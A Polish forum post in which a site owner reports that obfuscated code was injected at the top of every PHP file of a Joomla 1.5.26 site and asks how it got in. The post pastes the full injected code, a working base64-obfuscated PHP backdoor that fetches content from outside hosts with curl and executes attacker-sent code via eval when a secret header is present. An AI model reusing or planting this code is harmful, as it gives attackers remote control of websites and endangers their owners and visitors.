konto usunięte
Temat: Syfny kod w plikach .php - prośba o podzielenie się...
Hej,I stało się. Pomijam całą dyskusję o aktualizacjach, bezpieczeństwie itd. Same fakty:
Joomla 1.5.26, kilka osób miało dostęp, dwa konta FTP, kilka kont dostępowych do panelu.
W pewnym momencie zauważyłem taki kod doklejony do każdego (!!) pliku php (na początku plików), jak poniżej wklejony. Czy mieliście takie coś?
Firma hostingowa mówi, że mogą puścić po SSH skrypt oczyszczający i pewnie tak zrobię.
Czy mieliście taki numer kiedyś? Co było problemem? Wiem, że zwyczajowo to najczęściej klient FTP lub luka w module. Będzie cholernie ciężko do tego dojść. Czy to mogło się stać jakoś przez panel administratora, chyba nie, nie?
Jakiekolwiek pomysły cenne. Dograłem na razie do sajta RS Firewall, wypytuję dokładnie użytkowników co za soft mają na jakich OS-ach.
Miłosz Wojaczek edytował(a) ten post dnia 17.04.13 o godzinie 20:36
<?php /*versio:2.11*/$I11lI=0;$GLOBALS['I1Il'] = '}Y3VybA%2bX2luaXQYWxsb3dfdXJsX2ZvcGVudMQ(^)(b~X3NldG9wdA6X2V4ZWM2}5XwbY2xvc2U~84{PGltZyBzcmM9IgIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4fdw4a29ubW8ubmV0f19aa3RpcHAuY2g@c2lsYmVyLmRlWV8#f4;#OgcZGlzcGxheV9lcnJvcnM8^9ZGV0ZXJtaW5hdG9yam1sYWM_08Mi4xMQSWtjMnhUdjVBeTB3M2QdYmFzZTY0X2VuY29kZQYmFzZTY0X2RlY29kZQ}(e1aHR0cDovLw@SFRUUF9IT1NUSFRUUF9VU0VSX0FHRU5Ub_%dW5pb24^c2VsZWN0^UkVRVUVTVF9VUkk(U0NSSVBUX05BTUU71UVVFUllfU1RSSU5Hb$Pw2eL3RtcC8~0@L3RtcAc%)18VE1QVEVNUAf}*VE1QRElS*0edXBsb2FkX3RtcF9kaXIbLg3}dmVyc2lv_@}LQLXBocA,SFRUUF9FWEVDUEhQ~3}@;b3V01cb2s}aHR0cA);Oi8v*(L3BnLnBocD91PQ.53&~(Jms9,52JnQ9cGhwJnA9JnY9*6261736536345f6465636f6465';$I11lI=pack('H*',substr($GLOBALS['I1Il'], -26));if (!function_exists('QO0Q0OOO')){function QO0Q0OOO($QO, $QQ){$c=$GLOBALS['I1Il']; $d=pack('H*',substr($GLOBALS['I1Il'], -26)); return $d(substr($c, $QO, $QQ));}};eval($I11lI('aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJElJbGxJMSl7ICRRT09RT08gPSBRTzBRME9PTygxLCA2KTsgJFFRME9RUSA9ICRRT09RT08uUU8wUTBPT08oMTAsIDcpOyBpZiAoQGluaV9nZXQoUU8wUTBPT08oMTcsIDIwKSkgPT0gUU8wUTBPT08oMzgsIDIpKSB7ICRRT1EwUU89QGZpbGVfZ2V0X2NvbnRlbnRzKCRJSWxsSTEpOyByZXR1cm4gUU8wUTBPT08oNDMsIDApOyB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCRRUTBPUVEpKXsgJElJbElsbCA9IEAkUVEwT1FRKCk7ICRJMTFJMTEgPSAkUU9PUU9PLlFPMFEwT09PKDQ2LCAxMCk7ICRJSUkxbGwgPSAkUU9PUU9PLlFPMFEwT09PKDU3LCA3KTsgJFFPUU9RTyA9ICRRT09RT08uUU8wUTBPT08oNjcsIDIpLlFPMFEwT09PKDcwLCA3KTsgQCRJMTFJMTEoJElJbElsbCwgQ1VSTE9QVF9VUkwsICRJSWxsSTEpOyBAJEkxMUkxMSgkSUlsSWxsLCBDVVJMT1BUX0hFQURFUixmYWxzZSk7IEAkSTExSTExKCRJSWxJbGwsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7IEAkSTExSTExKCRJSWxJbGwsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsNSk7IGlmICgkSTExbDFJID0gQCRJSUkxbGwoJElJbElsbCkpIHtyZXR1cm4gUU8wUTBPT08oNDMsIDApO30gQCRRT1FPUU8oJElJbElsbCk7IHJldHVybiBRTzBRME9PTyg0MywgMCk7IH0gZWxzZSB7IHJldHVybiBRTzBRME9PTyg4MSwgMTQpLiRJSWxsSTEuUU8wUTBPT08oOTUsIDM5KTsgfSB9IGZ1bmN0aW9uIHVwZCgkSUlJSTFsLCRJSWxsSTEpeyAkSTFsSWxsPUBmb3BlbigkSUlJSTFsLFFPMFEwT09PKDEzNSwgMikpOyBAZmNsb3NlKCRJMWxJbGwpOyBpZiAoQGlzX2ZpbGUoJElJSUkxbCkpe3dyaXRlKCRJSUlJMWwsZ2V0ZmlsZSgkSUlsbEkxKSk7fTsgfSBmdW5jdGlvbiB3cml0ZSgkSUlJSTFsLCRJbEkxMUkpeyBpZiAoJElsSTFsMT1AZm9wZW4oJElJSUkxbCxRTzBRME9PTygxMzUsIDIpKSl7IEBmd3JpdGUoJElsSTFsMSwkSWxJMTFJKTsgQGZjbG9zZSgkSWxJMWwxKTsgfSB9ICRJbDFJbDEgPSBBcnJheShRTzBRME9PTygxMzgsIDEyKSwgUU8wUTBPT08oMTU0LCAxMSksIFFPMFEwT09PKDE2NiwgMTIpKTsgZnVuY3Rpb24gb3V0cHV0KCRRUU9RUVEsICRRTzBRUU8peyBlY2hvIFFPMFEwT09PKDE3OCwgMykuJFFRT1FRUS5RTzBRME9PTygxODYsIDIpLiRRTzBRUU8uIlxyXG4iOyB9IGZ1bmN0aW9uIHBhcmFtKCl7IHJldHVybiBRTzBRME9PTyg0MywgMCk7IH0gQGluaV9zZXQoUU8wUTBPT08oMTg5LCAxOSksIDApOyBkZWZpbmUoUU8wUTBPT08oMjExLCAxNiksIDEpOyAkSUkxbGxJPVFPMFEwT09PKDIyNywgNyk7ICRJSTFsSUk9UU8wUTBPT08oMjM3LCA2KTsgJElJMUlsMT1RTzBRME9PTygyNDMsIDE5KTsgJFEwTzBPMD1RTzBRME9PTygyNjMsIDE4KTsgJElJbElsMT1RTzBRME9PTygyODEsIDE4KTsgJElsbEkxMT1RTzBRME9PTygzMDMsIDEwKTsgJElsbEkxMS49c3RydG9sb3dlcihAJF9TRVJWRVJbUU8wUTBPT08oMzE0LCAxMildKTsgJFFPTzBPTyA9IEAkX1NFUlZFUltRTzBRME9PTygzMjYsIDIwKV07IGZvcmVhY2ggKCRfR0VUIGFzICRRUU9RUVE9PiRRTzBRUU8peyBpZiAoc3RycG9zKCRRTzBRUU8sUU8wUTBPT08oMzQ5LCA3KSkpeyRfR0VUWyRRUU9RUVFdPVFPMFEwT09PKDQzLCAwKTt9IGVsc2VpZiAoc3RycG9zKCRRTzBRUU8sUU8wUTBPT08oMzU3LCA4KSkpeyRfR0VUWyRRUU9RUVFdPVFPMFEwT09PKDQzLCAwKTt9IH0gaWYoIWlzc2V0KCRfU0VSVkVSW1FPMFEwT09PKDM2NiwgMTUpXSkpIHsgJF9TRVJWRVJbUU8wUTBPT08oMzY2LCAxNSldID0gJF9TRVJWRVJbUU8wUTBPT08oMzgyLCAxNSldOyBpZigkX1NFUlZFUltRTzBRME9PTygzOTksIDE2KV0pIHsgJF9TRVJWRVJbUU8wUTBPT08oMzY2LCAxNSldIC49IFFPMFEwT09PKDQxNywgMikgLiAkX1NFUlZFUltRTzBRME9PTygzOTksIDE2KV07IH0gfSBpZiAoJElJSWxsMT0kSWxsSTExLkAkX1NFUlZFUltRTzBRME9PTygzNjYsIDE1KV0peyAkUTBRMFEwPUBtZDUoJElsbEkxMS4kSUkxbElJLlBIUF9PUy4kSUkxSWwxKTsgJElsbGxJMT1RTzBRME9PTyg0MjEsIDcpOyAkUVFRMFFPID0gQXJyYXkoUU8wUTBPT08oNDMxLCA2KSwgQCRfU0VSVkVSW1FPMFEwT09PKDQ0MiwgNCldLCBAJF9TRVJWRVJbUU8wUTBPT08oNDQ2LCA2KV0sIEAkX0VOVltRTzBRME9PTyg0NDIsIDQpXSwgQCRfRU5WW1FPMFEwT09PKDQ1NSwgOCldLCBAJF9FTlZbUU8wUTBPT08oNDQ2LCA2KV0sIEBpbmlfZ2V0KFFPMFEwT09PKDQ2NiwgMTkpKSk7IGZvcmVhY2ggKCRRUVEwUU8gYXMgJFFPTzAwMCl7IGlmICghZW1wdHkoJFFPTzAwMCkpeyAkUU9PMDAwLj1ESVJFQ1RPUllfU0VQQVJBVE9SOyBpZiAoQGlzX3dyaXRhYmxlKCRRT08wMDApKXsgJElsbGxJMSA9ICRRT08wMDA7IGJyZWFrOyB9IH0gfSAkdG1wPSRJbGxsSTEuUU8wUTBPT08oNDg2LCAyKS4kUTBRMFEwOyBpZiAoQCRfU0VSVkVSWyJIVFRQX1lfQVVUSCJdPT0kUTBRMFEwKXsgZWNobyAiXHJcbiI7IEBvdXRwdXQoUU8wUTBPT08oNDkwLCA4KSwgJElJMWxJSS5RTzBRME9PTyg1MDEsIDIpLiRJSTFsbEkuUU8wUTBPT08oNTAzLCA2KSk7IGlmICgkSTExMTFsPSRJSWxJbDEoQCRfU0VSVkVSW1FPMFEwT09PKDUxMCwgMTYpXSkpe0BldmFsKCRJMTExMWwpO2VjaG8gIlxyXG4iO291dHB1dChRTzBRME9PTyg1MzEsIDQpLCBRTzBRME9PTyg1MzcsIDMpKTt9IGV4aXQoMCk7IH0gaWYgKEBpc19maWxlKCR0bXApKXtAaW5jbHVkZV9vbmNlKCR0bXApO30gZWxzZXsgJElJSWxsMT1AdXJsZW5jb2RlKCRJSUlsbDEpOyB1cGQoJHRtcCxRTzBRME9PTyg1NDEsIDYpLlFPMFEwT09PKDU0OSwgNCkuJElsMUlsMVswXS5RTzBRME9PTyg1NTUsIDE0KS4kSUlJbGwxLlFPMFEwT09PKDU3NSwgNCkuJFEwUTBRMC5RTzBRME9PTyg1ODIsIDEyKS4kSUkxbGxJLlFPMFEwT09PKDU5NCwgNCkuJElJMWxJSSk7IH0gfSB9'));?>